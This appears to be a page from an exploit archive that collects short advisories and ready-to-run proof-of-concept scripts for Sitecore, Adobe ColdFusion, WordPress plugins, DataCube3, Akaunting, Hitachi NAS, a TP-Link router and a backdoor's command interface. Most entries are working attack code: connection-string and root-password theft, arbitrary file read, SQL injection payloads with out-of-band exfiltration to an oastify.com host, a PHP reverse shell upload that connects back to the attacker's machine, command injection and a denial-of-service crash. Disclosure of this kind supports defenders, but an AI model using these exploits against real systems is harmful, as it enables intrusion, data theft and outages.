Sitecore version 8.2 suffers from a remote code execution vulnerability.

    #!/usr/bin/env python3## Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla# Google Dork: N/A# Date: 2024-01-08# Vendor Homepage: https://www.sitecore.com/# Software Link: https://dev.sitecore.net/# Version: 10.3# Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09# Video POC : https://youtu.be/vWKl9wgdTB0import argparseimport requestsfrom urllib.parse import quotefrom rich.console import Consoleconsole = Console()def initial_test(hostname):    # Initial payload to test vulnerability    test_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='TestVulnerability'    />    '''    encoded_payload = quote(test_payload)    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"    headers = {"Content-Type": "application/x-www-form-urlencoded"}    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)    response = requests.post(url, headers=headers, data=data, verify=False)    # Check for the test string in the Content-Type of the response    return 'TestVulnerability' in response.headers.get('Content-Type', '')def get_payload(choice):    # Payload templates for different options    payloads = {        '1': "<%$ ConnectionStrings:core %>",        '2': "<%$ ConnectionStrings:master %>",        '3': "<%$ ConnectionStrings:web %>"    }    base_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='{}'    />    '''    return base_payload.format(payloads.get(choice, "Invalid"))def main(hostname):    if initial_test(hostname):        print("Exploiting, Please wait...")        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")        print("Select the payload to use:")        print("1: Core connection strings")        print("2: Master connection strings")        print("3: Web connection strings")        payload_choice = input("Enter your choice (1, 2, or 3): ")        payload = get_payload(payload_choice)        encoded_payload = quote(payload)        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"        headers = {"Content-Type": "application/x-www-form-urlencoded"}        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)        response = requests.post(url, headers=headers, data=data)        if 'Content-Type' in response.headers:            print("Content-Type from the response header:")            print("\n")            print(response.headers['Content-Type'])        else:            print("No Content-Type in the response header. Status Code:", response.status_code)    else:        print("The target does not appear to be vulnerable to CVE-2023-35813.")if __name__ == "__main__":    console.print("[bold green]Author: Abhishek Morla[/bold green]")    console.print("[bold red]CVE-2023-35813[/bold red]")    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')    args = parser.parse_args()    main(args.hostname)

Sitecore 8.2 Remote Code Execution

Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360# Google Dork: [not]# Date: [12/28/2023]# Exploit Author: [Youssef Muhammad]# Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]# Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 andearlier]# Tested on: [Windows, Linux]# CVE : [CVE-2023-26360]import sysimport requestsimport jsonBANNER = """   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████    ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████   ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██   ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██    ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       """RED_COLOR = "\033[91m"GREEN_COLOR = "\032[42m"RESET_COLOR = "\033[0m"def print_banner():    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)    return 0def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):    if not endpoint.endswith('.cfc'):        endpoint += '.cfc'    if target_file.endswith('.cfc'):        raise ValueError('The TARGET_FILE must not point to a .cfc')    targeted_file = f"a/{target_file}"    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})    vars_get = {'method': 'test', '_cfclient': 'true'}    uri = f'{host}{endpoint}'    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)    file_data = None    splatter = '</TD></TD></TD></TH></TH></TH>'    if response.status_code in [404, 500] and splatter in response.text:        file_data = response.text.split(splatter, 1)[0]    if file_data is None:        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')    print(file_data)    # Save the output to a file    output_file_name = 'output.txt'    with open(output_file_name, 'w') as output_file:        output_file.write(file_data)        print(f"The output saved to {output_file_name}")if __name__ == "__main__":    if not 3 <= len(sys.argv) <= 5:        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")        sys.exit(1)    print_banner()    host = sys.argv[1]    target_file = sys.argv[2]    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None    try:        run_exploit(host, target_file, endpoint, proxy_url)    except Exception as e:        print(f"Error: {e}")

Adobe ColdFusion 2018,15 / 2021,5 Arbitrary File Read

Backdoor.Win32.Beastdoor.oq malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Beastdoor.oqVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in Windows directory. Third party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor.Family: BeastdoorType: PE32MD5: 6268df4c9c805c90725dde4fe5ef6feaVuln ID: MVID-2024-0674Dropped files: svchost.exeDisclosure: 03/09/2024Commands:27 return victims username and computer information5 or 19 will shutdown victims computer6 restart victims computer9 delete all files including program files16 victim computer screen goes black28 returns clipboard information30 terminates the backdoor and deletes it from the systemExploit/PoC:C:\sec>nc64.exe x.x.x.x 13322727VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe2828I dont like u30Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Beastdoor.oq MVID-2024-0674 Remote Command Execution

WordPress Duplicator plugin versions prior to 1.5.7.1 suffer from an unauthenticated sensitive data exposure vulnerability that can lead to account takeover.

    # Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -Unauthenticated Sensitive Data Exposure to Account Takeover# Google Dork: inurl:("plugins/duplicator/")# Date: 2023-12-04# Exploit Author: Dmitrii Ignatyev# Vendor Homepage:https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free# Software Link: https://wordpress.org/plugins/duplicator/# Version: 1.5.7.1# Tested on: Wordpress 6.4# CVE : CVE-2023-6114# CVE-Link :https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/Asevere vulnerability has been discovered in the directory*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not onlyexposes extensive information about the site, including itsconfiguration, directories, and files, but more critically, itprovides unauthorized access to sensitive data within the database andall data inside. Exploiting this vulnerability poses an imminentthreat, leading to potential *brute force attacks on password hashesand, subsequently, the compromise of the entire system*.*POC*:1) It is necessary that either the administrator or auto-backup worksautomatically at the scheduled time2) Exploit will send file search requests every 5 seconds3) I attack the site with this vulnerability using an exploitExploit sends a request to the server every 5 seconds along the path“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and ifit finds something in the index of, it instantly parses all the dataand displays it on the screenExploit (python3):import requestsfrom bs4 import BeautifulSoupimport reimport timeurl = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"processed_files = set()def get_file_names(url):    response = requests.get(url)    if response.status_code == 200 and len(response.text) > 0:        soup = BeautifulSoup(response.text, 'html.parser')        links = soup.find_all('a')        file_names = []        for link in links:            file_name = link.get('href')            if file_name != "../" and not file_name.startswith("?"):                file_names.append(file_name)        return file_names    return []def get_file_content(url, file_name):    file_url = url + file_name    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):        print(f"Ignoring file: {file_name}")        return None    file_response = requests.get(file_url)    if file_response.status_code == 200:        return file_response.text    return Nonewhile True:    file_names = get_file_names(url)    if file_names:        print("File names on the page:")        for file_name in file_names:            if file_name not in processed_files:                print(file_name)                file_content = get_file_content(url, file_name)                if file_content is not None:                    print("File content:")                    print(file_content)                    processed_files.add(file_name)    time.sleep(5)-- With best regards,Dmitrii Ignatyev, Penetration Tester

WordPress Duplicator Data Exposure / Account Takeover

RUPPEINVOICE version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: RUPPEINVOICE-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/09/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND'bCQt'='bCQt&password=g7J!m3v!W2&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)## Time spend:00:35:00

RUPPEINVOICE 1.0 SQL Injection

WordPress Hide My WP plugin versions 6.2.9 and below suffer from an unauthenticated remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11# Original Researcher: Xenofon Vassilakopoulos# Exploit Author: Xenofon Vassilakopoulos# Submitter: Xenofon Vassilakopoulos# Vendor Homepage: https://wpwave.com/# Version: Hide My WP v6.2.8 and prior# Tested on: Hide My WP v6.2.7# Impact: Database Access# CVE: CVE-2022-4681# CWE: CWE-89# CVSS Score: 8.6 (high)## DescriptionThe plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.## Proof of Conceptcurl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

WordPress Hide My WP SQL Injection

DataCube3 version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'# Date: 7/28/2022# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)# Vendor Homepage: https://www.f-logic.jp# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf# Version: Ver1.0# Tested on: DataCube3 version 1.0 (Ubuntu)# CVE : CVE-2024-25830 + CVE-2024-25832# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file uploadfrom __future__ import print_function, unicode_literalsfrom bs4 import BeautifulSoupimport argparseimport requestsimport jsonimport urllib3import reurllib3.disable_warnings()def banner():  dataCube3Logo = """         ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██        DataCube3   Ver1.0      █F-logic▓▓      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██                                ██▓▓████▓▓      ▒▒▒▒▒▒▒▒██        ██             ██       ██▓▓████▓▓      ▒▒▒▒▒▒▒▒██        █████████████████       ██▓▓▓▓▓▓▓▓        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓                                                                                                                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mDataCube3 exploit chain reverse shell\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))def extractRootPwd(RHOST, RPORT, protocol):  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)  try:    response = requests.get(url, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    scriptTag = str(soup.find_all('script')[12]).replace(' ', '')    rawLeakedData = re.findall('configData:.*,', scriptTag)[0]    jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))    adminPassword = jsonLeakedData[12]['value']    rootPassword = jsonLeakedData[14]['value']    print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))    return rootPassword  except:    print('[ERROR] Can\'t grab the DataCube3 version...')def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):  print('[INFO] Generating DataCube3 auth cookie ...')  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)  data = {    'user_id': 'root',    'user_pw': rootPassword,    'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'  }  try:    response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')      exit()    authCookie = response.cookies.get_dict()     print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))      return authCookie  except:    print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):  print('[INFO] Extracting Accesstime ...')  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)  try:    response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    accessTime = soup.find('input', {'name': 'accesstime'}).get('value')    print('[INFO] AccessTime value: {}'.format(accessTime))    return accessTime  except:    print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):  print('[INFO] Injecting PHP reverse shell script ...')  filename='rvs.php'  payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)  data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��è¿½å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)  headers = {      'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'  }  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)  try:    response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:        print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')        exit()    shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)    print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))    return shellURL  except:    print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')def execReverseShell(shellURL):  print('[INFO] Executing reverse shell...')  try:    response = requests.get(shellURL, allow_redirects=False, verify=False)    print('[INFO] Reverse shell successfully executed.')    return  except Exception as e:      print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')      return Falsedef main():  banner()  args = parser.parse_args()  protocol = 'https' if args.RPORT == 443 else 'http'  rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)  authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)  accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)  shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)  execReverseShell(shellURL)if __name__ == '__main__':  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)  parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)  parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)  parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)  parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)  main()

DataCube3 1.0 Shell Upload

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

    # Exploit Title: Akaunting < 3.1.3 - RCE# Date: 08/02/2024# Exploit Author: u32i@proton.me# Vendor Homepage: https://akaunting.com# Software Link: https://github.com/akaunting/akaunting# Version: <= 3.1.3# Tested on: Ubuntu (22.04)# CVE : CVE-2024-22836#!/usr/bin/python3import sysimport reimport requestsimport argparsedef get_company():  # print("[INF] Retrieving company id...")  res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)  if res.status_code != 302:    print("[ERR] No company id was found!")    sys.exit(3)  cid = res.headers['Location'].split('/')[-1]  if cid == "login":    print("[ERR] Invalid session cookie!")    sys.exit(7)  return ciddef get_tokens(url):  res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)  search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)  if not search_res:    print("[ERR] Couldn't get csrf token")    sys.exit(1)  data = {}  data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')  data['session'] = res.cookies.get('akaunting_session')  return datadef inject_command(cmd):  url = f"{target}/{company_id}/wizard/companies"  tokens = get_tokens(url)  headers.update({"X-Csrf-Token": tokens['csrf_token']})  data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      print("[ERR] Command injection failed!")      sys.exit(4)    print("[INF] Command injected!")def trigger_rce(app, version = "1.0.0"):  print("[INF] Executing the command...")  url = f"{target}/{company_id}/apps/install"  data = {"alias": app, "version": version, "path": f"apps/{app}/download"}  headers.update({"Content-Type":"application/json"})  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      search_res = re.search(r">Exit Code\:.*<", res_data['message'])      if search_res:        print("[ERR] Failed to execute the command")        sys.exit(6)      print("[ERR] Failed to install the app! no command was executed!")      sys.exit(5)    print("[INF] Executed successfully!")def login(email, password):  url = f"{target}/auth/login"  tokens = get_tokens(url)  cookies.update({    'akaunting_session': tokens['session']  })  data = {    "_token": tokens['csrf_token'],    "_method": "POST",    "email": email,    "password": password  }    req = requests.post(url, headers=headers, cookies=cookies, data=data)  res = req.json()  if res['error']:    print("[ERR] Failed to log in!")    sys.exit(8)  print("[INF] Logged in")  cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})    def main():  inject_command(args.command)  trigger_rce(args.alias, args.version)if __name__=='__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-u", "--url", help="target url")  parser.add_argument("--email", help="user login email.")  parser.add_argument("--password", help="user login password.")  parser.add_argument("-i", "--id", type=int, help="company id (optional).")  parser.add_argument("-c", "--command", help="command to execute.")  parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")  parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")  args = parser.parse_args()    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}  cookies = {}  target = args.url  try:    login(args.email, args.password)    company_id = get_company() if not args.id else args.id    main()  except:    sys.exit(0)

Akaunting 3.1.3 Remote Command Execution

Hitachi NAS SMU Backup and Restore versions prior to 14.8.7825.01 suffer from an insecure direct object reference vulnerability.

    #!/usr/bin/python3## Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE:              CVE-2023-5808# Date:             2023-12-13# Exploit Author:   Arslan Masood (@arszilla)# Vendor:           https://www.hitachivantara.com/# Version:          < 14.8.7825.01# Tested On:        13.9.7021.04        import argparsefrom datetime import datetimefrom os import getcwdimport requestsparser = argparse.ArgumentParser(    description="CVE-2023-5808 PoC",    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"    )# Create --host argument:parser.add_argument(    "--host",    required=True,    type=str,    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"    )# Create --id argument:parser.add_argument(    "--id",    required=True,    type=str,    help="JSESSIONID cookie value"    )# Create --sso argument:parser.add_argument(    "--sso",    required=True,    type=str,    help="JSESSIONIDSSO cookie value"    )args = parser.parse_args()def download_file(hostname, jsessionid, jsessionidsso):    # Set the filename:    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"    # Vulnerable SMU URL:    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"    # GET request cookies    smu_cookies = {        "JSESSIONID":       jsessionid,        "JSESSIONIDSSO":    jsessionidsso        }    # GET request headers:    smu_headers = {        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",        "Accept-Language":              "en-US,en;q=0.5",        "Accept-Encoding":              "gzip, deflate",        "Dnt":                          "1",        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",        "Upgrade-Insecure-Requests":    "1",        "Sec-Fetch-Dest":               "document",        "Sec-Fetch-Mode":               "navigate",        "Sec-Fetch-Site":               "same-origin",        "Sec-Fetch-User":               "?1",        "Te":                           "trailers",        "Connection":                   "close"        }    # Send the request:    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:        with open(filename, 'wb') as backup_archive:            # Write the zip file to the CWD:            backup_archive.write(file_download.content)    print(f"{filename} has been downloaded to {getcwd()}")if __name__ == "__main__":    download_file(args.host, args.id, args.sso)

Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference

There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.

    # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'# Date: 8/12/2023# Exploit Author: Anish Feroz (ZEROXINN)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N#Description:#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.#Usage:#python3 target username password#change port, if required------------------------------------------------POC-----------------------------------------#!/usr/bin/pythonimport requestsfrom requests.auth import HTTPBasicAuthimport base64def send_request(ip, username, password):    auth_url = f"http://{ip}:8082"    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"    credentials = f"{username}:{password}"    encoded_credentials = base64.b64encode(credentials.encode()).decode()    headers = {        "Host": f"{ip}:8082",        "Authorization": f"Basic {encoded_credentials}",        "Upgrade-Insecure-Requests": "1",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    session = requests.Session()        response = session.get(target_url, headers=headers)    if response.status_code == 200:        print("Server Crashed")        print(response.text)    else:        print(f"Script Completed with status code {response.status_code}")ip_address = input("Enter IP address of the host: ")username = input("Enter username: ")password = input("Enter password: ")send_request(ip_address, username, password)

Tag

#auth